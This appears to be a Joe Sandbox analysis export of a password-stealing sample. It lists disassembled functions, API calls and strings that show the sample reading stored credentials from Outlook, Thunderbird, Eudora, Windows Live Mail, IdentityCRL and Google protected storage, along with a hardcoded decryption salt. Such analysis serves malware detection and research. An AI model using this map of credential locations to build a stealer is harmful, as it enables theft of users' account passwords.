                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 379999529-620537770
                                                                                                    • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                    • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                    • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                    • API String ID: 1846531875-4223776976
                                                                                                    • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                    • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                    • API String ID: 745651260-375988210
                                                                                                    • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                    • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                    • API String ID: 1197458902-317895162
                                                                                                    • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                    • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                    • String ID: h4ND
                                                                                                    • API String ID: 3662548030-3825183422
                                                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                    • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                    • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                    Strings
                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                    • API String ID: 832325562-2578778931
                                                                                                    • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                    • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                    • String ID: %s@yahoo.com
                                                                                                    • API String ID: 317221925-3288273942
                                                                                                    • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                    • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 355 404af5-404afa 349->355 354 404adb 350->354 351->349 352 404ae8-404aea 351->352 352->355 354->351 356 404b13-404b17 355->356 357 404afc-404b12 MessageBoxA 355->357
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
